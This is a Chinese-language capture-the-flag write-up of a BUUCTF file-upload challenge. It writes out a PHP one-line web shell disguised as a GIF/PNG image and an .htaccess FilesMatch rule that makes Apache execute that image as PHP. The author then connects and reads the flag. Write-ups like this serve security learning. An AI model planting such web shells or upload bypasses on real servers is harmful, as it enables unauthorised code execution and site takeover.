BUUCTF之[MRCTF2020]你传你🐎呢

虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。
首先,启动挑战的项目
在这里插入图片描述
emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上传漏洞,结果没做出来。
不管怎么样,先上传一句话木马。并且将下面的内容保存成文件1.png

GIF89a? 
<script language="php">eval($_POST['zyh']);</script>

然后该上传改文件,并且用BurpSuite来抓包
在这里插入图片描述
结果发现php php2 phtml 这些文件的后缀名都不能绕过检测。所以就直接上传1.png,抱着试试看的心态。
在这里插入图片描述
在这里插入图片描述
当我点击这个测试连接的时候,结果返回错误信息。。。。
在这里插入图片描述
挣扎了好一段时间后跑去看别人的WP才知道这题是一个文件上传里的文件解析漏洞。总结下来的经验就是更改Apache里的.htaccess的配置。可以将其它类型的文件转化为PHP的文件类型。

来源网站:https://www.cnblogs.com/adforce/archive/2012/11/23/2784664.html
.htaccess是什么

启用.htaccess,需要修改httpd.conf,启用AllowOverride,并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名,可以用AccessFileName指令来改变。例如,需要使用.config ,则可以在服务器配置文件中按以下方法配置:AccessFileName .config 。

笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。

那么现在开始写一个.htaccess文件,里面的内容为:

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

注意里面的1.png要和你刚才上传的文件名一模一样!
现在返回到刚才的挑战页面,上传这个配置文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
最后flag在根目录下的flag文件下
在这里插入图片描述
在这里插入图片描述

Logo

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐